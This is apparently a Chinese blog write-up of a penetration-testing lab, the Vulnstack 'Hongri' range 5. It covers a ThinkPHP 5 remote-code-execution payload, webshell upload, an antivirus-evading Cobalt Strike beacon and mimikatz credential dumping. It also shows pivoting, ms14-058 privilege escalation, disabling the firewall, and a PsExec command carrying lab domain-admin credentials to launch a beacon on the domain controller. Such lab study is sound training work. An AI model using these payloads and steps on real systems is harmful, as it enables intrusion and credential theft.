红日内网靶机5学习

网络配置说明:首先还是需要将自己的网络环境设置完善。域控使用仅主机模式,IP段192.168.138.0/24,且物理机关闭仅主机网卡,保证域控与物理主机无法通信。Win7使用双网卡,一张采用仅主机模式,与域控通信,一张网卡采用NAT模式用于联网与物理机通信。

靶机地址信息:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

 

 

信息搜集:

还是常规的信息搜集,做一次主机发现与端口扫描。这里端口扫描采用NMAP,主机扫描采用Nessus同时进行。

红日内网靶机5学习_第1张图片

开放了80和3306两个端口。

尝试对Mysql进行连接,发现禁止连接:

红日内网靶机5学习_第2张图片

访问80端口,发现存在一个ThinkPHP的站点,使用不存在的控制器报错,确定具体版本:

红日内网靶机5学习_第3张图片

对于TP5的站点,首先还是利用RCE漏洞打一遍,说不定就成了。然后确实成了了:

https://www.cnblogs.com/backlion/p/10106676.html

payload:index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

红日内网靶机5学习_第4张图片

尝试写入webshell:

写入成功,执行命令并且连接:

红日内网靶机5学习_第5张图片

使用蚁剑连接:

红日内网靶机5学习_第6张图片

 

使用bypassAV制作一个免杀的CS马,然后上传到服务器,成功获取CS:

红日内网靶机5学习_第7张图片

 

内网信息搜集:

首先进行一下内网的信息搜集,看是否存在域:

查看网卡信息:

红日内网靶机5学习_第8张图片

存在第二张网卡。

通过systeminfo查看系统相关信息:

红日内网靶机5学习_第9张图片

补丁只存在3个,可以试试有没有可以利用的提权漏洞。

 

 

 

 

运行了一下mimikatz,成功抓到了heart用户的密码。

红日内网靶机5学习_第10张图片

同时发现存在域账户的账号密码:

红日内网靶机5学习_第11张图片

 

为了方便再弹一个msf的shell,发现靶机环境不是特别好,直接可以获取系统system权限。

红日内网靶机5学习_第12张图片

然后查看系统的网卡信息:

红日内网靶机5学习_第13张图片

通过get_local_subnets查看到第二张网卡的信息,应该就是内网地址,添加一个路由去往第二层。

红日内网靶机5学习_第14张图片

可以查看到我们添加的网卡信息:

红日内网靶机5学习_第15张图片

之后使用msf的漏洞模块探测内网主机是否存在特定漏洞:

首先是ms17_010

发现扫描应该打开了445端口,但是无法进行利用:

红日内网靶机5学习_第16张图片

之后还是使用cs进行内网渗透:

先推荐一个cs的教材,以及很多有用的cs插件:https://www.cnblogs.com/ichunqiu/p/12106209.html

 

首先使用msf反弹一个system权限的shell到cs:

 

这里是使用cs进行端口扫描,尝试使用psexec进行登录管理系统。

端口扫描结束,可以发现新加了一台目标机器:

红日内网靶机5学习_第17张图片

如果目标机器出网可以使用psexec尝试登陆,不出网的话需要使用已有的外网机器当作跳板机,使这台外网机器变成一个监听器:

红日内网靶机5学习_第18张图片

然后重新生成一个shell,选择这个监听器:

红日内网靶机5学习_第19张图片

之后将psexec和新生成的shell一起上传。

因为win7存在防火墙,可以先关闭防火墙:

之前的heart权限太小,可以利用ms14-058进行提权,elevate插件存在这个提权脚本

红日内网靶机5学习_第20张图片

红日内网靶机5学习_第21张图片

获取system权限之后重新关闭防火墙:

红日内网靶机5学习_第22张图片

接下来就可以使用psexec登录系统然后执行cs的shell:

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec.exe -accepteula \\192.168.138.138 -u SUN\Administrator -p dc123.c0m -d -c C:\phpStudy\PHPTutorial\WWW\public\beacon.exe

红日内网靶机5学习_第23张图片

获取到DC的shell:时间有点长,需要等待

运行mimikatz尝试获取域控密码:

嗯。。。。。运行的时候beacon全部掉线了。

 

 

 

你可能感兴趣的:(内网渗透,内网渗透学习,CS,msf)